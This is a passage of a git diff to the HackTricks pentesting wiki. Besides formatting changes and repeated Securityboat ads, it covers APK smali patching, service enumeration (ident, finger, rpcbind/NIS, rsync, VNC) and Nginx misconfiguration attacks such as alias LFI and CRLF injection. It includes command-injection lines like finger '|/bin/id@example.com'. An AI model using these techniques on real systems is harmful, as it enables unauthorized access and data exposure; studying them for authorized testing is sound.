+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + + Sometimes it is interesting to modify the application code to access hidden information for you (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it. **Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html) -# Fast Way +## Fast Way Using **Visual Studio Code** and the [APKLab](https://github.com/APKLab/APKLab) extension, you can **automatically decompile**, modify, **recompile**, sign & install the application without executing any command. -# Decompile the APK +## Decompile the APK Using APKTool you can access to the **smali code and resources**: @@ -43,7 +51,7 @@ Some **interesting files you should look are**: If `apktool` has **problems decoding the application** take a look to [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) or try using the argument **`-r`** (Do not decode resources). Then, if the problem was in a resource and not in the source code, you won't have the problem (you won't also decompile the resources). -# Change smali code +## Change smali code You can **change** **instructions**, change the **value** of some variables or **add** new instructions. I change the Smali code using [**VS Code**](https://code.visualstudio.com), you then install the **smalise extension** and the editor will tell you if any **instruction is incorrect**.\ Some **examples** can be found here: @@ -53,7 +61,7 @@ Some **examples** can be found here: Or you can [**check below some Smali changes explained**](smali-changes.md#modifying-smali). -# Recompile the APK +## Recompile the APK After modifying the code you can **recompile** the code using: @@ -65,7 +73,7 @@ It will **compile** the new APK **inside** the _**dist**_ folder. If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/) -## **Sing the new APK** +### **Sing the new APK** Then, you need to **generate a key** (you will be asked for a password and for some information that you can fill randomly): @@ -79,7 +87,7 @@ Finally, **sign** the new APK: jarsigner -keystore key.jks path/to/dist/* ``` -## Optimize new application +### Optimize new application **zipalign** is an archive alignment tool that provides important optimisation to Android application (APK) files. [More information here](https://developer.android.com/studio/command-line/zipalign). @@ -88,15 +96,15 @@ zipalign [-f] [-v] infile.apk outfile.apk zipalign -v 4 infile.apk ``` -## **Sign the new APK (again?)** +### **Sign the new APK (again?)** -If you **prefer** to use \[**apksigner**]\(**[https://developer.android.com/studio/command-line/apksigner](https://developer.android.com/studio/command-line/apksigner)**)** instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling**. BUT NOTICE THAT** YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE** WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling). +If you **prefer** to use \[**apksigner**]\([**https://developer.android.com/studio/command-line/apksigner**](https://developer.android.com/studio/command-line/apksigner))\*\* instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling\*\*. BUT NOTICE THAT\*\* YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE\*\* WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling). ```bash apksigner sign --ks key.jks ./dist/mycompiled.apk ``` -# Modifying Smali +## Modifying Smali For the following Hello World Java code: @@ -120,9 +128,9 @@ The Smali code would be: The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions). -## Light Changes +### Light Changes -## Modify initial values of a variable inside a function +### Modify initial values of a variable inside a function Some variables are defined at the beginning of the function using the opcode _const_, you can modify its values, or you can define new ones: @@ -134,7 +142,7 @@ const/4 v8, 0x1 const-string v5, "wins" ``` -## Basic Operations +### Basic Operations ``` #Math @@ -159,9 +167,9 @@ if-ne v0, v9, :goto_6 #If not equals, go to: :goto_6 goto :goto_6 #Always go to: :goto_6 ``` -## Bigger Changes +### Bigger Changes -## Logging +### Logging ``` #Log win: @@ -180,7 +188,7 @@ Recommendations: * The new variables should be the next numbers of the already declared variables (in this example should be _v10_ and _v11_, remember that it starts in v0). * Change the code of the logging function and use _v10_ and _v11_ instead of _v5_ and _v1_. -## Toasting +### Toasting Remember to add 3 to the number of _.locals_ at the begging of the function. @@ -198,6 +206,12 @@ move-result-object v12 invoke-virtual {v12}, Landroid/widget/Toast;->show()V ``` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -214,5 +228,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/network-services-pentesting/113-pentesting-ident.md b/network-services-pentesting/113-pentesting-ident.md index 818d5868..f379a701 100644 --- a/network-services-pentesting/113-pentesting-ident.md +++ b/network-services-pentesting/113-pentesting-ident.md @@ -1,4 +1,4 @@ - +# 113 - Pentesting Ident
@@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Basic Information +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} -Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) connection. +## Basic Information + +Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol\_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission\_Control\_Protocol) connection. **Default port:** 113 @@ -28,9 +34,9 @@ PORT STATE SERVICE 113/tcp open ident ``` -# **Enumeration** +## **Enumeration** -## **Manual - Get user/Identify the service** +### **Manual - Get user/Identify the service** If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing: @@ -44,7 +50,7 @@ Other errors: ![](<../.gitbook/assets/image (17).png>) -## Nmap +### Nmap By default (-sC) nmap will identify every user of every running port: @@ -63,7 +69,7 @@ PORT STATE SERVICE VERSION |_auth-owners: root ``` -## Ident-user-enum +### Ident-user-enum Ident-user-enum is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`. @@ -77,15 +83,15 @@ ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum ) 192.168.1.100:445 root ``` -## Shodan +### Shodan * `oident` -# Files +## Files identd.conf -# HackTricks Automatic Commands +## HackTricks Automatic Commands ``` Protocol_Name: Ident #Protocol Abbreviation if there is one. @@ -106,6 +112,12 @@ Entry_2: Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports) ``` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -122,5 +134,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/network-services-pentesting/2375-pentesting-docker.md b/network-services-pentesting/2375-pentesting-docker.md index 9dd1ec1c..5bcd6996 100644 --- a/network-services-pentesting/2375-pentesting-docker.md +++ b/network-services-pentesting/2375-pentesting-docker.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## Docker Basics ### What is @@ -349,6 +356,13 @@ falco-probe found and loaded in dkms You can use auditd to monitor docker. +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/network-services-pentesting/5353-udp-multicast-dns-mdns.md index bcfc6773..dcec89a3 100644 --- a/network-services-pentesting/5353-udp-multicast-dns-mdns.md +++ b/network-services-pentesting/5353-udp-multicast-dns-mdns.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## Basic Information Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform **DNS-like operations** on the local network in the absence of a conventional, unicast DNS server. The protocol uses the **same** API, **packet formats**, and operating semantics as DNS, allowing you to resolve domain names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that allows clients to **discover a list of named instances of services** (such as test.\_ipps.\_tcp.local, or linux.\_ssh.\_tcp.local) in a domain using standard DNS queries. DNS-SD is most often used in conjunction with mDNS but isn’t dependent on it. They’re both used by many IoT devices, such as network printers, Apple TVs, Google Chromecast, Network-Attached Storage (NAS) devices, and cameras.\ @@ -106,6 +113,13 @@ For more information check: * [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical\_IoT\_Hacking.html?id=GbYEEAAAQBAJ\&redir\_esc=y) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/554-8554-pentesting-rtsp.md b/network-services-pentesting/554-8554-pentesting-rtsp.md index 432335bf..8d0170db 100644 --- a/network-services-pentesting/554-8554-pentesting-rtsp.md +++ b/network-services-pentesting/554-8554-pentesting-rtsp.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## Basic Information > The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording). @@ -98,8 +105,14 @@ Cameradar allows you to: * Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content * Try to create a Gstreamer pipeline to check if they are properly encoded * Print a summary of all the informations Cameradar could get +* [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) -[https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
diff --git a/network-services-pentesting/873-pentesting-rsync.md b/network-services-pentesting/873-pentesting-rsync.md index 3307ed0a..a52297b2 100644 --- a/network-services-pentesting/873-pentesting-rsync.md +++ b/network-services-pentesting/873-pentesting-rsync.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## **Basic Information** > **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. @@ -111,6 +118,13 @@ find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \) Inside the config file sometimes you could find the parameter _secrets file = /path/to/file_ and this file could contains usernames and passwords allowed to authenticate to rsyncd. +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/pentesting-finger.md b/network-services-pentesting/pentesting-finger.md index 587f13f0..4bb89886 100644 --- a/network-services-pentesting/pentesting-finger.md +++ b/network-services-pentesting/pentesting-finger.md @@ -1,4 +1,4 @@ - +# 79 - Pentesting Finger
@@ -16,28 +16,34 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# **Basic Info** +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} -**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number \(if known\), login time, idle time, time mail was last read, and the user's plan and project files. +## **Basic Info** + +**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files. **Default port:** 79 -```text +``` PORT STATE SERVICE 79/tcp open finger ``` -# **Enumeration** +## **Enumeration** -## **Banner Grabbing/Basic connection** +### **Banner Grabbing/Basic connection** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` -## **User enumeration** +### **User enumeration** ```bash finger @ #List users @@ -53,35 +59,40 @@ finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` -### **Nmap execute a script for doing using default scripts** +#### **Nmap execute a script for doing using default scripts** -## Metasploit uses more tricks than Nmap +### Metasploit uses more tricks than Nmap -```text +``` use auxiliary/scanner/finger/finger_users ``` -## Shodan +### Shodan * `port:79 USER` -# Command execution +## Command execution ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` -# Finger Bounce +## Finger Bounce [Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/) -```text +``` finger user@host@victim finger @internal@external ``` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -98,5 +109,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/network-services-pentesting/pentesting-rpcbind.md b/network-services-pentesting/pentesting-rpcbind.md index 620e8766..379a7924 100644 --- a/network-services-pentesting/pentesting-rpcbind.md +++ b/network-services-pentesting/pentesting-rpcbind.md @@ -1,4 +1,4 @@ - +# 111/TCP/UDP - Pentesting Portmapper
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Basic Information +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +## Basic Information Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service. @@ -28,7 +34,7 @@ PORT STATE SERVICE 111/tcp open rpcbind ``` -# Enumeration +## Enumeration ``` rpcinfo irked.htb @@ -39,11 +45,11 @@ Sometimes it doesn't give you any information, in other occasions you will get s ![](<../.gitbook/assets/image (230).png>) -## Shodan +### Shodan * `port:111 portmap` -# RPCBind + NFS +## RPCBind + NFS If you find the service NFS then probably you will be able to list and download(and maybe upload) files: @@ -51,7 +57,7 @@ If you find the service NFS then probably you will be able to list and download( Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more about how to test this protocol. -# NIS +## NIS If you find the service `ypbind`running: @@ -81,7 +87,7 @@ yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash | /etc/group | group.byname, group.bygid | NIS group file | | /usr/lib/aliases | mail.aliases | Details mail aliases | -# RPC Users +## RPC Users If you find the **rusersd** service listed like this: @@ -89,17 +95,17 @@ If you find the **rusersd** service listed like this: You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md). -# Bypass Filtered Portmapper port +## Bypass Filtered Portmapper port If during a nmap scan you see open ports like NFS but the port 111 is filtered, you won't be able to exploit those ports.\ But, if you can simulate a locally a portmapper service and you tunnel the NFS port from your machine to the victim one, you will be able to use regular tools to exploit those services.\ More information in [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc) -# Shodan +## Shodan * `Portmap` -# HackTricks Automatic Commands +## HackTricks Automatic Commands ``` Protocol_Name: Portmapper #Protocol Abbreviation if there is one. @@ -125,6 +131,12 @@ Entry_3: Command: nmap -sSUC -p 111 {IP} ``` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -141,5 +153,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/network-services-pentesting/pentesting-vnc.md b/network-services-pentesting/pentesting-vnc.md index ae8467ba..539b8d9a 100644 --- a/network-services-pentesting/pentesting-vnc.md +++ b/network-services-pentesting/pentesting-vnc.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## Basic Information In computing, **Virtual Network Computing** (**VNC**) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical-screen updates back in the other direction, over a network.\ @@ -64,6 +71,13 @@ I save the tool here also for ease of access: * `port:5900 RFB` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/pentesting-web/nginx.md b/network-services-pentesting/pentesting-web/nginx.md index 921a9c48..2e31019e 100644 --- a/network-services-pentesting/pentesting-web/nginx.md +++ b/network-services-pentesting/pentesting-web/nginx.md @@ -1,4 +1,4 @@ - +# Nginx
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Missing root location +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +## Missing root location ``` server { @@ -30,11 +36,11 @@ server { } ``` -The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`. +The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`. A request as simple as `GET /nginx.conf` would reveal the contents of the Nginx configuration file stored in `/etc/nginx/nginx.conf`. If the root is set to `/etc`, a `GET` request to `/nginx/nginx.conf` would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication. -# Alias LFI Misconfiguration +## Alias LFI Misconfiguration Inside the Nginx configuration look the "location" statements, if someone looks like: @@ -78,7 +84,7 @@ alias../../../../../../../../../../../ => HTTP status code 400 alias../ => HTTP status code 403 ``` -# Unsafe variable use +## Unsafe variable use An example of a vulnerable Nginx configuration is: @@ -100,13 +106,13 @@ Location: https://example.com/ Detectify: clrf ``` -Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/). +Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/). -## Any variable +### Any variable In some cases, user-supplied data can be treated as an Nginx variable. It’s unclear why this may be happening, but it’s not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365), thus revealing that this is due to SSI. -One way to test for this is to set a referer header value: +One way to test for this is to set a referer header value: ``` $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’ @@ -114,9 +120,9 @@ $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched. -# Raw backend response reading +## Raw backend response reading -With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response? +With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response? If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx won’t understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this: @@ -127,7 +133,7 @@ def application(environ, start_response): return [b"Secret info, should not be visible!"] ``` -And with the following directives in Nginx: +And with the following directives in Nginx: ``` http { @@ -139,7 +145,7 @@ http { [proxy\_intercept\_errors](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx. -[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client. +[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client. If we send a normal `GET` request, Nginx will return: @@ -169,13 +175,13 @@ Secret-Header: secret-info Secret info, should not be visible! ``` -# merge\_slashes set to off +## merge\_slashes set to off The [merge\_slashes](http://nginx.org/en/docs/http/ngx\_http\_core\_module.html#merge\_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d). -We found 33 Nginx configuration files with `merge_slashes` set to “off”. +We found 33 Nginx configuration files with `merge_slashes` set to “off”. -# default is not specified for map directive +## default is not specified for map directive It looks like common case when **`map` is used for some kind of authorization control**. Simplified example could look like: @@ -208,11 +214,9 @@ server { > sets the resulting value if the source value matches none of the specified variants. When default is not specified, the default\ > resulting value will be an empty string. -It is easy to forget about `default` value. So **malefactor can bypass this "authorization control"** simply accessing a **non existent case inside `/map-poc`** like `https://targethost.com/map-poc/another-private-area`. - -# DNS Spoofing Nginx - +It is easy to forget about `default` value. So **malefactor can bypass this "authorization control"** simply accessing a **non existent case inside `/map-poc`** like `https://targethost.com/map-poc/another-private-area`. +## DNS Spoofing Nginx According to this post: [http://blog.zorinaq.com/nginx-resol**ver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) **It might be possible to spoof DNS records** to Nginx if you **know the DNS server Nginx** is using (and you can intercept somehow the communication, so this is **not valid if 127.0.0.1** is used) and the **domain it's asking**. @@ -222,31 +226,37 @@ Nginx can specify a DNS server to use with: resolver 8.8.8.8; ``` -# `proxy_pass` and `internal` directives +## `proxy_pass` and `internal` directives The **`proxy_pass`** directive can be used to **redirect internally requests to other servers** internal or external.\ The **`internal`** directive is used to make it clear to Nginx that the **location can only be accessed internally**. The use of these directives **isn't a vulnerability but you should check how are them configured**. -# Try it yourself +## Try it yourself Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself! [https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx) -# Static Analyzer tools +## Static Analyzer tools -## [GIXY](https://github.com/yandex/gixy) +### [GIXY](https://github.com/yandex/gixy) Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection. -# References +## References -* [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)**** -* ****[**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)**** -* ****[**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)**** +* [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/) +* [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) +* [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -263,5 +273,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md index 177131c4..de3dbbc1 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md +++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md @@ -1,4 +1,4 @@ - +# URL Format Bypass
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
